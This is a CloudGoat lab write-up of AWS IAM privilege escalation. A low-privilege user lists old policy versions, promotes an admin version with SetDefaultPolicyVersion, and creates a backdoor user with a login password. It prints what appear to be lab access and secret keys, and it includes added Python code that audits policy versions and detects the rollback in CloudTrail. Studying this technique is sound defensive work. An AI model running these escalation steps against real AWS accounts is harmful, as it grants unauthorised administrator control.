IAM PrivEsc - RollBack
Review previous versions of the IAM user's policies to PrivEsc
Ultimate Goal
From an IAM User "Raynor" => To acquire full Admin Privileges
Getting Started
Deploy the lab via cloudgoat
cat /Users/d0p/Cloudgoat/iam_privesc_by_rollback_cgidq5mcziu8uh/start.txt
cloudgoat_output_aws_account_id = 242643118057
cloudgoat_output_policy_arn = arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh
cloudgoat_output_raynor_access_key_id = AKIATQ7VIE7UZGXOZL5K
cloudgoat_output_raynor_secret_key = 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
cloudgoat_output_username = raynor-iam_privesc_by_rollback_cgidq5mcziu8uh
We now have Raynor's access key and secret key. Let's configure an AWS CLI profile for them:
aws configure --profile ray
[ACCESS KEY]:
[SECRET KEY]:
....
Now that the profile ray exists, let's see whether we have the privilege to create a demo user:
aws iam create-user --user-name demo --profile ray
An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:iam::242643118057:user/raynor-iam_privesc_by_rollback_cgidq5mcziu8uh is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::242643118057:user/demo because no identity-based policy allows the iam:CreateUser action
Sadly, we don't have access to create a user.
Let's dig deeper by enumerating the policies attached to the IAM user raynor!
aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
"AttachedPolicies": [
{
"PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh",
"PolicyArn": "arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh"
}
]
}
Let's quickly make a note of that PolicyArn.
Now that we know a policy is attached, let's try getting the policy version:
aws iam get-policy-version --profile ray
usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:
aws help
aws <command> help
aws <command> <subcommand> help
aws: error: the following arguments are required: --policy-arn, --version-id
Seems like we need the version id. Let's try getting that first!
aws iam list-policy-versions --profile ray
usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:
aws help
aws <command> help
aws <command> <subcommand> help
aws: error: the following arguments are required: --policy-arn
Let's just paste the copied PolicyArn and list the version ids:
aws iam list-policy-versions --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
"Versions": [
{
"VersionId": "v5",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v2",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-09-21T09:09:44+00:00"
}
]
}
From this we learn that the default version of the policy attached to raynor is v1.
Now that we know how many versions exist, let's examine each version in detail via get-policy-version.
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v1 --profile ray
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"iam:Get*",
"iam:List*",
"iam:SetDefaultPolicyVersion"
],
"Effect": "Allow",
"Resource": "*",
"Sid": "IAMPrivilegeEscalationByRollback"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-09-21T09:09:44+00:00"
}
}
V1 => Grants the listed IAM actions (iam:Get*, iam:List*, and iam:SetDefaultPolicyVersion) across all resources in the AWS account.
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v5 --profile ray
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject",
"s3:ListAllMyBuckets"
],
"Resource": "*"
}
},
"VersionId": "v5",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
}
}
V5 => Allows the actions s3:ListBucket, s3:GetObject, and s3:ListAllMyBuckets on all resources.
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v4 --profile ray
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": {
"Effect": "Deny",
"Action": "*",
"Resource": "*",
"Condition": {
"NotIpAddress": {
"aws:SourceIp": [
"192.0.2.0/24",
"203.0.113.0/24"
]
}
}
}
},
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
}
}
V4 => Denies all actions on all resources unless the source IP address of the request matches one of the specified ranges, 192.0.2.0/24 or 203.0.113.0/24.
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v3 --profile ray
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Action": "iam:Get*",
"Resource": "*",
"Condition": {
"DateGreaterThan": {
"aws:CurrentTime": "2017-07-01T00:00:00Z"
},
"DateLessThan": {
"aws:CurrentTime": "2017-12-31T23:59:59Z"
}
}
}
},
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
}
}
V3 => Allows iam:Get* only while the request time falls between 2017-07-01 and 2017-12-31 ("DateGreaterThan" and "DateLessThan" conditions on aws:CurrentTime), a window that has already passed.
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Action": "*",
"Effect": "Allow",
"Resource": "*"
}
]
},
"VersionId": "v2",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
}
}
V2 => Grants unrestricted access to all actions ("Action": "*") on all resources ("Resource": "*") within the AWS account.
This is the version we need to abuse. Since v1 allows iam:SetDefaultPolicyVersion, let's set v2 as the default policy version!
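Before moving on, here is the check a defender would run to catch this misconfiguration ahead of time. This is an added example, not code from CloudGoat or from the original write-up: it audits a managed policy's version history for "rollback risk", meaning a default version that allows iam:SetDefaultPolicyVersion while a non-default version would grant far more (here, full admin). The five policy documents are embedded as constructed samples mirroring the versions listed above; in a real audit you would fetch them with boto3's list_policy_versions and get_policy_version, and the remediation is to delete the over-privileged non-default versions (delete-policy-version) and to stop granting iam:SetDefaultPolicyVersion to the very identity the policy is attached to.

```python
"""Audit an IAM managed policy's version history for rollback-based escalation.

Added example, not part of the CloudGoat lab or the write-up. Runs offline on
the constructed policy documents below.
"""
import fnmatch

# Constructed sample: the five versions of cg-raynor-policy as shown in the
# write-up (same statements, trimmed to what matters for the audit).
POLICY_VERSIONS = {
    "v1": {"default": True, "doc": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Resource": "*",
         "Action": ["iam:Get*", "iam:List*", "iam:SetDefaultPolicyVersion"]}]}},
    "v2": {"default": False, "doc": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
    "v3": {"default": False, "doc": {"Version": "2012-10-17", "Statement": {
        "Effect": "Allow", "Action": "iam:Get*", "Resource": "*",
        "Condition": {"DateGreaterThan": {"aws:CurrentTime": "2017-07-01T00:00:00Z"},
                      "DateLessThan": {"aws:CurrentTime": "2017-12-31T23:59:59Z"}}}}},
    "v4": {"default": False, "doc": {"Version": "2012-10-17", "Statement": {
        "Effect": "Deny", "Action": "*", "Resource": "*",
        "Condition": {"NotIpAddress": {"aws:SourceIp": ["192.0.2.0/24", "203.0.113.0/24"]}}}}},
    "v5": {"default": False, "doc": {"Version": "2012-10-17", "Statement": {
        "Effect": "Allow", "Resource": "*",
        "Action": ["s3:ListBucket", "s3:GetObject", "s3:ListAllMyBuckets"]}}},
}


def _as_list(value):
    """IAM lets Statement, Action and Resource be a single item or a list."""
    return value if isinstance(value, list) else [value]


def _unconditional_allows(doc):
    """Yield Allow statements that carry no Condition block."""
    for stmt in _as_list(doc["Statement"]):
        if stmt.get("Effect") == "Allow" and "Condition" not in stmt:
            yield stmt


def action_allowed(doc, action):
    """True if some unconditional Allow pattern (e.g. iam:Get*) matches `action`.

    Deliberately ignores Deny statements and conditions: we want the
    optimistic view of what a version hands out, not a full policy simulator.
    """
    return any(fnmatch.fnmatchcase(action, pattern)
               for stmt in _unconditional_allows(doc)
               for pattern in _as_list(stmt.get("Action", [])))


def grants_admin(doc):
    """A version counts as admin when an unconditional Allow has Action * on Resource *."""
    return any("*" in _as_list(stmt.get("Action", [])) and
               "*" in _as_list(stmt.get("Resource", []))
               for stmt in _unconditional_allows(doc))


def rollback_risk(versions):
    """Summarise whether the policy's own default version lets the holder
    promote a more powerful non-default version (the technique in the lab)."""
    default_id = next(vid for vid, meta in versions.items() if meta["default"])
    can_set_default = action_allowed(versions[default_id]["doc"], "iam:SetDefaultPolicyVersion")
    admin_versions = sorted(vid for vid, meta in versions.items()
                            if not meta["default"] and grants_admin(meta["doc"]))
    return {
        "default": default_id,
        "can_set_default": can_set_default,
        "admin_versions": admin_versions,            # candidates for delete-policy-version
        "escalation_possible": can_set_default and bool(admin_versions),
    }


if __name__ == "__main__":
    print(rollback_risk(POLICY_VERSIONS))
```

Run against the constructed versions the audit reports default v1, can_set_default True and admin_versions ["v2"], which is exactly the combination this lab abuses. The matcher uses fnmatch only for the `*` wildcard in action names; it is an approximation of IAM's evaluation (no Deny, no conditions, no resource-level matching) that is good enough to flag versions worth a human look.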
aws iam set-default-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray
Now let's cross-check with list-policy-versions that v2 is the default policy version:
aws iam list-policy-versions --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
"Versions": [
{
"VersionId": "v5",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v2",
"IsDefaultVersion": true,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v1",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:44+00:00"
}
]
}
Yes, it is.
So now let's try to create the demo user with our new privileges:
aws iam create-user --user-name demo --profile ray
{
"User": {
"Path": "/",
"UserName": "demo",
"UserId": "AIDATQ7VIE7URIBSBP5WG",
"Arn": "arn:aws:iam::242643118057:user/demo",
"CreateDate": "2023-09-21T09:34:09+00:00"
}
}
It works!
But wait, let's cross-check that we really have full admin access by creating a login profile for the demo user:
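The sequence just walked through (CreateUser denied, SetDefaultPolicyVersion, CreateUser succeeds) is also what a detection engineer should key on in CloudTrail. The following is an added example, not code from CloudGoat or the original write-up: it correlates, per principal, an AccessDenied on some action, a later successful SetDefaultPolicyVersion, and then the same action succeeding within a time window. The CloudTrail records are constructed to mirror the lab's timeline and are not real logs; field names (eventName, userIdentity.arn, errorCode, requestParameters) follow the standard CloudTrail record format.

```python
"""Detect rollback-style privilege escalation in CloudTrail records.

Added example, not part of the CloudGoat lab or the write-up. The events
below are constructed to mirror the write-up's timeline.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RAYNOR = "arn:aws:iam::242643118057:user/raynor-iam_privesc_by_rollback_cgidq5mcziu8uh"
POLICY = "arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh"

# Constructed CloudTrail-style records (not real logs): denied attempt,
# rollback, successful retry, plus one unrelated benign event.
EVENTS = [
    {"eventTime": "2023-09-21T09:20:00Z", "eventName": "CreateUser",
     "userIdentity": {"arn": RAYNOR}, "errorCode": "AccessDenied",
     "requestParameters": {"userName": "demo"}},
    {"eventTime": "2023-09-21T09:31:00Z", "eventName": "SetDefaultPolicyVersion",
     "userIdentity": {"arn": RAYNOR},
     "requestParameters": {"policyArn": POLICY, "versionId": "v2"}},
    {"eventTime": "2023-09-21T09:34:09Z", "eventName": "CreateUser",
     "userIdentity": {"arn": RAYNOR},
     "requestParameters": {"userName": "demo"}},
    {"eventTime": "2023-09-21T09:40:00Z", "eventName": "GetUser",
     "userIdentity": {"arn": "arn:aws:iam::242643118057:user/auditor"},
     "requestParameters": {"userName": "demo"}},
]


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def set_default_version_events(events):
    """Every successful SetDefaultPolicyVersion deserves a look on its own:
    it is rare in normal operations and changes effective permissions at once."""
    return [e for e in events
            if e["eventName"] == "SetDefaultPolicyVersion" and not e.get("errorCode")]


def rollback_then_privilege_use(events, window=timedelta(hours=1)):
    """Per principal: AccessDenied on action A, then SetDefaultPolicyVersion,
    then A succeeding within `window`. Returns one finding per such chain."""
    by_actor = defaultdict(list)
    for e in events:
        by_actor[e["userIdentity"]["arn"]].append(e)

    findings = []
    for actor, evs in by_actor.items():
        evs.sort(key=_ts)
        for i, rb in enumerate(evs):
            if rb["eventName"] != "SetDefaultPolicyVersion" or rb.get("errorCode"):
                continue
            # Actions this actor was refused before the rollback.
            denied = {e["eventName"] for e in evs[:i] if e.get("errorCode") == "AccessDenied"}
            for later in evs[i + 1:]:
                if _ts(later) - _ts(rb) > window:
                    break
                if later["eventName"] in denied and not later.get("errorCode"):
                    findings.append({
                        "actor": actor,
                        "policyArn": rb["requestParameters"]["policyArn"],
                        "versionId": rb["requestParameters"]["versionId"],
                        "action": later["eventName"],
                        "when": later["eventTime"],
                    })
    return findings


if __name__ == "__main__":
    for f in rollback_then_privilege_use(EVENTS):
        print(f"ALERT {f['actor']} set {f['policyArn']} to {f['versionId']} "
              f"then succeeded at {f['action']} at {f['when']}")
```

On the constructed events the correlation yields a single finding for raynor: policy set to v2, then CreateUser succeeds. The standalone SetDefaultPolicyVersion alert is lower fidelity but catches the case where the attacker never triggered an AccessDenied first, so both rules are worth running; a natural hardening follow-up is to require that the principal making the call is not the one the policy is attached to.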
aws iam create-login-profile --user-name demo --password Passw0rd --profile ray
{
"LoginProfile": {
"UserName": "demo",
"CreateDate": "2023-09-21T09:35:59+00:00",
"PasswordResetRequired": false
}
}
To log in to the console we also need the AWS account ID:
cat iam_privesc_by_rollback_cgidq5mcziu8uh/start.txt
cloudgoat_output_aws_account_id = 2x264x118x57
........

Exploitation Route